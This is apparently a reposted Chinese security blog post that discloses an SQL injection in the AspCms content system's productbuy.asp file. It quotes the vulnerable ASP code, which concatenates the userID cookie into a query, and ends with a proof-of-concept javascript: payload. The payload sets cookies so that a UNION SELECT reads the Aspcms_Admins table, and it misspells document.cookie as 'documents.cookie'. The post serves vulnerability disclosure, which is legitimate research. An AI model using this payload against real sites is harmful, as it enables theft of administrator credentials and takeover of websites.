前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注入漏洞。。。。。。。
废话不多说,看代码: 搜狗电脑知识技巧
<%
if action = "buy" then
addOrder()
else
echoContent()
end if
……略过
Sub echoContent()
dim id
id=getForm("id","get")
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
Dim templatePath,tempStr
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
selectproduct=rsObj(0)
Dim linkman,gender,phone,mobile,email,qq,address,postcode
if isnul(rCookie("loginstatus")) thenwCookie"loginstatus",0
if rCookie("loginstatus")=1 then
set rsObj=conn.Exec("select *from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
linkman=rsObj("truename")
gender=rsObj("gender")
phone=rsObj("phone")
mobile=rsObj("mobile")
email=rsObj("email")
qq=rsObj("qq")
address=rsObj("address")
postcode=rsObj("postcode")
else
gender=1
end if
rsObj.close()
with templateObj
.content=loadFile(templatePath)
.parseHtml()
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
.content=replaceStr(.content,"[aspcms:linkman]",linkman)
.content=replaceStr(.content,"[aspcms:gender]",gender)
.content=replaceStr(.content,"[aspcms:phone]",phone)
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
.content=replaceStr(.content,"[aspcms:email]",email)
.content=replaceStr(.content,"[aspcms:qq]",qq)
.content=replaceStr(.content,"[aspcms:address]",address)
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
.parseCommon()
echo .content
end with
set templateobj =nothing : terminateAllObjects
End Sub
漏洞很明显,没啥好说的
poc:
javascript:alert(documents.cookie="loginstatus=" + escape("1"));alert(documents.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));